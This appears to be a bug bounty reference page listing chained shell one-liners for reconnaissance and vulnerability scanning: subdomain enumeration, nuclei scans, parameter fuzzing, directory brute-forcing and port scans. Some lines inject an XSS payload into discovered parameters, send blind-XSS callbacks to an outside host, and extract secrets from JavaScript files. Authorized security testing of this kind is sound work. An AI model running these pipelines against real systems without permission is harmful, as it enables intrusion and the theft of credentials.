Description
Battle-tested one-liner command pipelines that chain multiple tools together for efficient bug bounty reconnaissance. These workflows automate the process from initial discovery through vulnerability scanning.
Full Recon Pipeline
BASH
# Subdomain → Alive → Vulnerability scan
subfinder -d target.com -silent | httpx -silent | nuclei -s critical,high
# Comprehensive subdomain discovery
(subfinder -d target.com -silent; amass enum -passive -d target.com; assetfinder --subs-only target.com) | sort -u | httpx -silent > alive.txtParameter Discovery → Exploitation
BASH
# Find params and test XSS
paramspider -d target.com | qsreplace "<script>alert(1)</script>" | httpx -silent
# Params to Dalfox
gau target.com | grep "=" | sort -u | dalfox pipe --blind "https://xss.hunter"Subdomain Takeover Check
BASH
subfinder -d target.com | httpx -silent | nuclei -t takeovers/JavaScript Analysis
BASH
# Find all JS files
katana -u https://target.com -jc | grep "\.js$" | httpx -silent | tee js-files.txt
# Extract secrets from JS
cat js-files.txt | while read url; do python SecretFinder.py -i "$url" -o cli; doneMass Directory Fuzzing
BASH
cat alive.txt | xargs -I {} ffuf -u {}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200 -t 50Port Scan → Service Enum
BASH
# Fast port scan then detailed nmap
rustscan -a target.com -- -sV -sC -oA detailed-scan